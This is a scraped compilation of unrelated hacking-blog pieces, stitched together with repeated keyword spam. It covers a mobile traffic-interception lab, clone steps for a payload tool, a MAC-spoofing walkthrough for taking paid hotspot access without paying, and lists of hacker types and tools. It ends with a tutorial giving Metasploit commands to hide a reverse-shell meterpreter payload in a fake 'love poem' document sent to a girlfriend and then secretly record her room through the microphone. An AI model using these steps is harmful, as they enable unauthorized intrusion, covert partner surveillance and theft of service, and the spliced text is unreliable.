Create Your Own MITM Test Lab

Please consult the detailed guide on setting up your own Snifflab network here: https://openeffect.ca/snifflab-an-environment-for-testing-mobile-devices/

Researchers and end-users alike often seek to understand what data their mobile device is sending to third parties. Unfortunately, monitoring one’s phone to see what, and to whom, data is sent is not exactly simple. Using packet capture software on Android is impossible without first rooting the device, and even then, difficult to use and export saved data. There are no applications to capture packets on iOS.

Our motivation for creating the test environment described herein is to make it incredibly easy to capture packets for any device with a WiFi connection, with very little client configuration needed.

How it works

In our environment, dubbed Snifflab, a researcher simply connects to the Snifflab WiFi network, is prompted to install a custom certificate authority on the device, and then can use their device as needed for the test.

Snifflab architecture

All traffic on the network is logged by a Raspberry Pi dedicated to that task (“PCAP Collecting Machine”, in the Figure). The traffic is cloned by a Great Scott Gadgets Throwing Star LAN Tap, which routes it both to its destination, and to our Raspberry Pi. The Pi continually collects packet data, creating new packet capture (pcap) files at a regular interval, or once the active file reaches a configurable size. Saved files are regularly transferred to another machine (“Backup Machine”) for persistent storage. Users with SSH access to the Pi can also manually restart the pcap service, to get instant access to the captured packets, instead of waiting for the interval.

The custom certificate that each client must install enables the proxy server (“MITM Proxy Machine”) through which Snifflab routes its traffic to intercept HTTPS requests to the outside world, and re-encrypt them using certificates generated on-the-fly. This allows for the researcher to later decrypt most captured network traffic sent over HTTPS.

On the backup machine, the researcher has access to all previously-collected PCAPs, organized into folders by date, with each file named by the unix time at which the capture began.

The researcher may then open up the collected PCAP(s) in Wireshark or their utility of choice to analyze and decrypt the traffic.

On packet captures

A Packet capture (pcap) is a widely used data format for storing low-level network data transmission information. The packet is the base unit of data transmission on networks. To send a message from one computer to another, networking software breaks up the message into small packet files, each with metadata that — among other things — describes the source of the data, the destination, and the specific packet’s ID so that packets can be reassembled correctly at the destination. A pcap file is a collection of packets sent over a network. pcaps are created using software that “listens” to one or more network interfaces running on a given device, and dumps all the data packets it detects into a pcap file for future analysis. 

For example, one could listen on a computer’s WiFi interface, or the ethernet interface, or both.

Github Project

Enigma Multipartform Payload

PREREQUISITES

• python 2.7 for enigma.py
• python 3.x for enigma.py
• metasploit
• msfvenom

TESTED ON

 Kali Linux - ROLLING EDITION

CLONE

git clone https://github.com/UndeadSec/Enigma.git

RUNNING

cd Enigma

python enigma.py

or

python3 enigma3.py

Hacking WIFI Password (Paid Hotspots)

Prerequisite:
Operating System; Kali Linux Highly recommended

Alfa USB Adapter

An Alfa Wifi Card; reason because Kali Linux ships together all the drivers for this card, and supports monitor mode and has an extension for connecting external antennae, hence can pick wifi signals from a distance 

How does it work?

You all know that moment: the happy moment that you find a public hotspot followed with the dissapointment because of a pop-up thats asks for a login-code.
Everyones #1 frustration, atleast it is mine. Now you can either be a nice guy and buy one of those cards, or you can be stubborn and try to hack stuff.
We’re going for the second one.

The security on these hotspots are usually based on MAC-addresses.
The router has already been set-up to decide which computers can and cannot use the internet.
During the login process, access is given to the internet with a code: your MAC-address is being saved in a sort of database.
This will stay there for a couple of hours, depending on how much you payed for. After these hours are over,
the MAC-address will be automaticaly removed from the database that’s from the router, and your access to the internet will be removed.

If you don’t have one of these cards, you won’t be able to use the internet either.
But you are however connected to the network (Atleast the connection to the network that connects you to the login page.)
You might feel it coming already, you can pry/spy into the network! What we will do isn’t really difficult and I will sum it up in three steps:

1. Look which devices are connected to the network (Which MAC-addresses have internet.)
2. Change your MAC-address to a MAC-address with access to the internet.
3. Re-connect to the Access Point, the Hotspot.

Once you connect to the network again, the router will recognize you as an user that paid to
use the internet and it will grant you access to the internet.

Execution
It’s best if you have Linux to execute this. I myself use Kali Linux, but any distro should work.

Open your terminal, we will turn off our wlan interface. Type:

ifconfig wlan0 down

Now we will put our network interface in a monitor mode:

iwconfig wlan0 mode monitor

And now we will check if that actually happened:

iwconfig

Now we will look for all networks nearby you. These networks will then be shown with a BSSID MAC-address.

airodump-ng wlan0

a screen shot of airodump-ng displaying all the networks with their BSSID adress 

Wait a while untill your ‘target network’ appears and then copy the BSSID that belongs to it.
Then press CTRL+C to stop airodump-ng. Otherwise it will endlessly continue to search for networks.

Now we will look for every device on the network.
The devices are the computers that are connected to the network and are shown in the form of a MAC-address.
It can take a while before these computers are found. It’s important to wait a while to see which MAC-address has alot of traffic.
This is the one that we will use, copy the MAC-address.

airodump-ng -bssid [MAC ADDRESS OF THE NETWORK HERE] wlan0

Then:

ifconfig wlan0 down

And then we can change our MAC-address to the one which you choose:

maccchanger -m [MAC ADDRESS OF THE COMPUTER WHICH YOU CHOSE] wlan0

Now you will get a verification that your MAC-address has changed.
If you successfully did this, we will change our interface again in ‘manage mode’:

iwconfig wlan0 mode manage

Then turn on our WiFi-adapter again:

ifconfig wlan0 up

Check to see if it’s on:

ifconfig

Now you will go to the network interface GUI. Connect again with your Hotspot and you can enjoy your free internet.

Conclusion:
As you can see you can have access to the internet in a few easy steps.
The way around the security in this way is much faster and the chance to succeed is much faster than the standard way of WEP/WPA2 hacking.

Types of Hackers

Hackers can be classified into different categories such as white hat, black hat, and grey hat, based on their intent of hacking a system.t

hical hacking tutorial for free. Professional ethical hacking tutorial. how to hack. hacking course. ethical hacking course. a to z ethical hacking course. what is hacking . what is ethical hacking.

WHITE HAT HACKERS

White Hat hackers are also known as Ethical Hackers. They never intent to harm a system, rather they try to find out weaknesses in a computer or a network system as a part of penetration testing and vulnerability assessments.

Ethical hacking is not illegal and it is one of the demanding jobs available in the IT industry. There are numerous companies that hire ethical hackers for penetration testing and vulnerability assessments. ethical hacking tutorial for free. Professional ethical hacking tutorial. how to hack. hacking course. ethical hacking course. a to z ethical hacking course. what is hacking . what is ethical hacking.

BLACK HAT HACKERS

Black Hat hackers, also known as crackers, are those who hack in order to gain unauthorized access to a system and harm its operations or steal sensitive information.

Black Hat hacking is always illegal because of its bad intent which includes stealing corporate data, violating privacy, damaging the system, blocking network communication, etc. ethical hacking tutorial for free. Professional ethical hacking tutorial. how to hack. hacking course. ethical hacking course. a to z ethical hacking course. what is hacking . what is ethical hacking.

GREY HAT HACKERS

Grey hat hackers are a blend of both black hat and white hat hackers. They act without malicious intent but for their fun, they exploit a security weakness in a computer system or network without the owner’s permission or knowledge.

Their intent is to bring the weakness to the attention of the owners and getting appreciation or a little bounty from the owners.

MISCELLANEOUS HACKERS

Apart from the above well-known classes of hackers, we have the following categories of hackers based on what they hack and how they do it − ethical hacking tutorial for free. Professional ethical hacking tutorial. how to hack. hacking course. ethical hacking course. a to z ethical hacking course. what is hacking . what is ethical hacking.

Red Hat Hackers

Red hat hackers are again a blend of both black hat and white hat hackers. They are usually on the level of hacking government agencies, top-secret information hubs, and generally anything that falls under the category of sensitive information. ethical hacking tutorial for free. Professional ethical hacking tutorial. how to hack. hacking course. ethical hacking course. a to z ethical hacking course. what is hacking . what is ethical hacking.

Blue Hat Hackers

A blue hat hacker is someone outside computer security consulting firms who is used to bug-test a system prior to its launch. They look for loopholes that can be exploited and try to close these gaps. Microsoft also uses the term BlueHat to represent a series of security briefing events. ethical hacking tutorial for free. Professional ethical hacking tutorial. how to hack. hacking course. ethical hacking course. a to z ethical hacking course. what is hacking . what is ethical hacking.

Elite Hackers

This is a social status among hackers, which is used to describe the most skilled. Newly discovered exploits will circulate among these hackers. ethical hacking tutorial for free. Professional ethical hacking tutorial. how to hack. hacking course. ethical hacking course. a to z ethical hacking course. what is hacking . what is ethical hacking.

Script Kiddie

A script kiddie is a non-expert who breaks into computer systems by using pre-packaged automated tools written by others, usually with little understanding of the underlying concept, hence the term Kiddie. ethical hacking tutorial for free. Professional ethical hacking tutorial. how to hack. hacking course. ethical hacking course. a to z ethical hacking course. what is hacking . what is ethical hacking.

Neophyte

A neophyte, "n00b", or "newbie" or "Green Hat Hacker" is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology and hacking. ethical hacking tutorial for free. Professional ethical hacking tutorial. how to hack. hacking course. ethical hacking course. a to z ethical hacking course. what is hacking . what is ethical hacking.

Hacktivist

A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denialof-service attacks. ethical hacking tutorial for free. Professional ethical hacking tutorial. how to hack. hacking course. ethical hacking course. a to z ethical hacking

Hacking Tools

In this chapter, we will discuss in brief some of famous tools that are widely used to prevent hacking and getting unauthorized access to a computer or network system.  famous ethical hacker. world famous hacker. ethical hacking tutorial for free. Professional ethical hacking tutorial. how to hack. hacking course. ethical hacking course. a to z ethical hacking course. what is hacking . what is ethical hacking.

NMAP

Nmap stands for Network Mapper. It is an open source tool that is used widely for network discovery and security auditing. Nmap was originally designed to scan large networks, but it can work equally well for single hosts. Network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.  famous ethical hacker. world famous hacker. ethical hacking tutorial for free. Professional ethical hacking tutorial. how to hack. hacking course. ethical hacking course. a to z ethical hacking course. what is hacking . what is ethical hacking.

Nmap uses raw IP packets to determine −

·        what hosts are available on the network,

·        what services those hosts are offering,

·        what operating systems they are running on,

·        what type of firewalls are in use, and other such characteristics.

Nmap runs on all major computer operating systems such as Windows, Mac OS X, and Linux.

METASPLOIT

Metasploit is one of the most powerful exploit tools. It’s a product of Rapid7 and most of its resources can be found at: www.metasploit.com. It comes in two versions − commercial and free edition. Matasploit can be used with command prompt or with Web UI.

With Metasploit, you can perform the following operations −

·        Conduct basic penetration tests on small networks

·        Run spot checks on the exploitability of vulnerabilities

·        Discover the network or import scan data

·        Browse exploit modules and run individual exploits on hosts 

 famous ethical hacker. world famous hacker. ethical hacking tutorial for free. Professionalcking tutorial. how to hack. hacking course. ethical hacking course. a to z ethical hacking course. what is hacking . what is ethical hacking.

BURP SUIT

Burp Suite is a popular platform that is widely used for performing security testing of web applications. It has various tools that work in collaboration to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Burp is easy to use and provides the administrators full control to combine advanced manual techniques with automation for efficient testing. Burp can be easily configured and it contains features to assist even the most experienced testers with their work.  famous ethical hacker. world famous hacker. ethical hacking tutorial for free. Professional ethical hacking tutorial. how to hack. hacking course. ethical hacking course. a to z ethical hacking course. what is hacking . what is ethical hacking.

ANGRY IP SCANNER

Angry IP scanner is a lightweight, cross-platform IP address and port scanner. It can scan IP addresses in any range. It can be freely copied and used anywhere. In order to increase the scanning speed, it uses multithreaded approach, wherein a separate scanning thread is created for each scanned IP address.

Angry IP Scanner simply pings each IP address to check if it’s alive, and then, it resolves its hostname, determines the MAC address, scans ports, etc. The amount of gathered data about each host can be saved to TXT, XML, CSV, or IP-Port list files. With help of plugins, Angry IP Scanner can gather any information about scanned IPs.  famous ethical hacker. world famous hacker. ethical hacking tutorial for free. Professional ethical hacking tutorial. how to hack. hacking course. ethical hacking course. a to z ethical hacking course. what is hacking . what is ethical hacking.

CAIN & ABEL

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It helps in easy recovery of various kinds of passwords by employing any of the following methods −

·        sniffing the network,

·        cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks,

·        recording VoIP conversations,

·        decoding scrambled passwords,

·        recovering wireless network keys,

·        revealing password boxes,

·        uncovering cached passwords and analyzing routing protocols.

Cain & Abel is a useful tool for security consultants, professional penetration testers and everyone else who plans to use it for ethical reasons.

ETTERCAP

Ettercap stands for Ethernet Capture. It is a network security tool for Man-in-the-Middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. Ettercap has inbuilt features for network and host analysis. It supports active and passive dissection of many protocols.

You can run Ettercap on all the popular operating systems such as Windows, Linux, and Mac OS X.

ETHERPEEK

EtherPeek is a wonderful tool that simplifies network analysis in a multiprotocol heterogeneous network environment. EtherPeek is a small tool (less than 2 MB) that can be easily installed in a matter of few minutes.

EtherPeek proactively sniffs traffic packets on a network. By default, EtherPeek supports protocols such as AppleTalk, IP, IP Address Resolution Protocol (ARP), NetWare, TCP, UDP, NetBEUI, and NBT packets.

SUPERSCAN

SuperScan is a powerful tool for network administrators to scan TCP ports and resolve hostnames. It has a user friendly interface that you can use to −

·        Perform ping scans and port scans using any IP range.

·        Scan any port range from a built-in list or any given range.

·        View responses from connected hosts.

·        Modify the port list and port descriptions using the built in editor.

·        Merge port lists to build new ones.

·        Connect to any discovered open port.

·        Assign a custom helper application to any port.

QUALYSGUARD

QualysGuard is an integrated suite of tools that can be utilized to simplify security operations and lower the cost of compliance. It delivers critical security intelligence on demand and automates the full spectrum of auditing, compliance and protection for IT systems and web applications.

QualysGuard includes a set of tools that can monitor, detect, and protect your global network.

WEBINSPECT

WebInspect is a web application security assessment tool that helps identify known and unknown vulnerabilities within the Web application layer.

It can also help check that a Web server is configured properly, and attempts common web attacks such as parameter injection, cross-site scripting, directory traversal, and more.

LC4

LC4 was formerly known as L0phtCrack. It is a password auditing and recovery application. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, and hybrid attacks.

LC4 recovers Windows user account passwords to streamline migration of users to another authentication system or to access accounts whose passwords are lost.

LANGUARD NETWORK SECURITY SCANNER

LANguard Network Scanner monitors a network by scanning connected machines and providing information about each node. You can obtain information about each individual operating system.

It can also detect registry issues and have a report set up in HTML format. For each computer, you can list the netbios name table, current logged-on user, and Mac address.

NETWORK STUMBLER

Network stumbler is a WiFi scanner and monitoring tool for Windows. It allows network professionals to detect WLANs. It is widely used by networking enthusiasts and hackers because it helps you find non-broadcasting wireless networks.

Network Stumbler can be used to verify if a network is well configured, its signal strength or coverage, and detect interference between one or more wireless networks. It can also be used to non-authorized connections.

TONELOC

ToneLoc stands for Tone Locator. It was a popular war dialling computer program written for MS-DOS in the early 90’s. War dialling is a technique of using a modem to automatically scan a list of telephone numbers, usually dialling every number in a local area code.

Malicious hackers use the resulting lists in breaching computer security - for guessing user accounts, or locating modems that might provide an entry-point into computer or other electronic systems.

It can be used by security personnel to detect unauthorized devices on a company’s telephone network. 

How to Spy on Anyone:Hacking Computers

Now that nearly everyone and everyplace has a computer, you can use those remote computers for some good old "cloak and dagger" spying. No longer is spying something that only the CIA, NSA, KGB, and other intelligence agencies can do—you can learn to spy, too. 

In this brand new series, we will explore how we can use the ubiquity of the computer to peek in on just about anyone and anyplace. Unlike the spy movies of yesteryear where the spy had to place a listening device in the lamp or in a houseplant, as long as there is a computer in the room, it can be used as a "bug."

We will examine how to turn that commonplace computer into our own bug to listen in on conversations, use as a spy camera, track Internet searches, and more. James Bond and Q have nothing on us!

In this first part, I will show you how to convert any computer, anywhere, into a listening device. As nearly every room now has a computer in it, you can put a bug in nearly every room, unnoticed and undetected.

FIRE UP KALI

The first step, of course, is to fire up Kali Linux. To be able to use any computer as a bug, the first step will be to compromise the target computer.

COMPROMISE THE REMOTE COMPUTER HACK

Probably the best way to compromise your target's computer is to use a carefully crafted email that will get the target to click on a document or link. Inside that document or link, we will embed a rootkit/listener that will enable us to turn on the built-in microphone on their computer and save any conversations in the room where it is located.

Since we know the victim (it may be a girlfriend, neighbor, spouse, business associate, foreign diplomat, foreign spy, etc.), we can can be very specific in crafting an email that would gain their acceptance. The key, of course, is to create document that sounds compelling, or at least interesting, to get the victim to click on the Word document.

This becomes an exercise in social engineering at this point. If the victim is a girlfriend/boyfriend, you might try sending a love letter. If the victim is a business associate, it might be Word or Excel document with a sales or other report. If it is a neighbor, it may be a link to a community webpage.

I hope you get the point. Be creative and imaginative and send something that the person will be compelled to open and view.

FIND AN EXPLOIT

Now, if we want to exploit a Windows 7 system (most Windows 7 exploits will work on Windows 8), we will need to find a Windows 7 exploit that utilizes vulnerabilities in Microsoft's Word application.

This past spring, Microsoft revealed that hackers had found a vulnerability in Microsoft Word and Office Web apps that could allow remote code execution (read, rootkit). Here is Microsoft's announcement on their Technet Security Bulletin below (more info on Technet can be found here).

As you can see, they have named it MS14-017. When we do a search in Metasploitfor this vulnerability/exploit, we find:

exploit/windows/fileformat/ms14_017_rtf

Now that we have found the proper exploit, let's load it into Metasploit by typing:

msf >use exploit/windows/fileformat/ms14_017_rtf

Once we have it loaded, let's type "info" to find more about this exploit.

Now, "show options."

As you can see, the option we need to fill is the FILENAME. In addition, note that this exploit works only on Office 2010.

SET THE FILENAME

In this example, we will be spying on your girlfriend, so let's send her a love poem. Let's set the FILENAME to "lovepoem.rtf."

set FILENAME lovepoem.rtf

SET THE PAYLOAD

Next, we need to set the payload to place in her "lovepoem." In this case, let's send the meterpreter as it gives us almost unlimited power and control over the hacked system.

msf > set PAYLOAD windows/meterpreter/reverse_tcp

Next, set the LHOST. This is the IP of your system. This tells the payload who to call back when it is executed by the victim.

Finally, simply type "exploit." This will create a Word file called "lovepoem" that will place the meterpreter on her system that we can then connect to.

OPEN A MULTI-HANDLER FOR THE CONNECTION

For the next step, we need to open a multi-handler to receive the connection back to our system.

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp

And finally, set the LHOST to your IP.

SEND THE LOVE POEM TO YOUR GIRFRIEND

Now that we have created our malicious file, you need to send it to your girlfriend. You likely will want to send it via an email attachment with a note telling her that your wrote her a short poem to express your love for her. Knowing that it is from you, I'm sure she will click on it as she loves you dearly and trusts you completely.

COMPROMISE HER SYSTEM

When she opens it, we will have a meterpreter session on her computer like that below. Now comes the good part.

RECORD WITH THE MICROPHONE

What we will do next is enable the microphone on her computer and begin to record all of the sounds within earshot of it. Metasploit has a Ruby script that will enable the microphone on the target machine and begin to record all sounds and conversations nearby. If we go to our ultimate list of meterpreter scripts, we can find it among the many ready Ruby scripts built for the meterpreter.

From the meterpreter prompt, simply type:

meterpreter > run sound_recorder - l /root

This will start the microphone on her computer and store the recorded conversations and sounds in a file in the /root directory on your system. Of course, you can choose any directory to store these recordings. Just make certain you have adequate hard drive space, as these files can become very large. When you want to hear what was recorded, simply open the stored file on your system.